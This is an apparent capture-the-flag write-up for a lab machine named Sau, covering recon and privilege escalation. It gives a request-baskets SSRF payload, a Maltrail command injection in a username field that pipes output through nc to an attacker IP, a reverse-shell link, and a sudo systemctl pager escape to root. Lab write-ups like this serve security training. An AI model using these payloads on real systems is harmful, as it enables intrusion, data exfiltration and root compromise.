Sau

• Date completed: 2023-07-09
• Difficulty: Easy
• OS: Linux

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.224
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 17:36 CDT
Nmap scan report for 10.10.11.224
Host is up (0.050s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
|   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sat, 08 Jul 2023 22:38:09 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sat, 08 Jul 2023 22:37:43 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sat, 08 Jul 2023 22:37:43 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.54 seconds

We aren't able to access anything on port 80, so we'll take a look at 55555.

That port is running request-baskets version 1.2.1, which is vulnerable to an exploit (https://notes.sjtu.edu.cn/s/MUUhEymt7).

We can take the payload used there and change proxy_response to true, then use it to make requests to things we can't access externally.

{
"forward_url": "http://127.0.0.1:80",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}

It looks like port 80 is running maltrail version 0.53, which is also vulnerable (https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/)

We can execute commands and read the output using a listener and this payload:

{
"forward_url": "http://127.0.0.1:8338/login?username=`cat%20/home/puma|nc%2010.10.14.114%205555",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}

Root flag

Get a reverse shell using https://github.com/izenynn/c-reverse-shell/blob/main/linux.c and compiling it on the remote machine.

After getting a shell, run:

python3 -c "import pty;pty.spawn('/bin/bash')"

Then background the shell with ctrl-Z and run

stty raw -echo
fg

Then run sudo -l to see what commands can be run:

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Run the only command we can as root, which bring up a pager. Type !cat /root/root.txt to get the flag!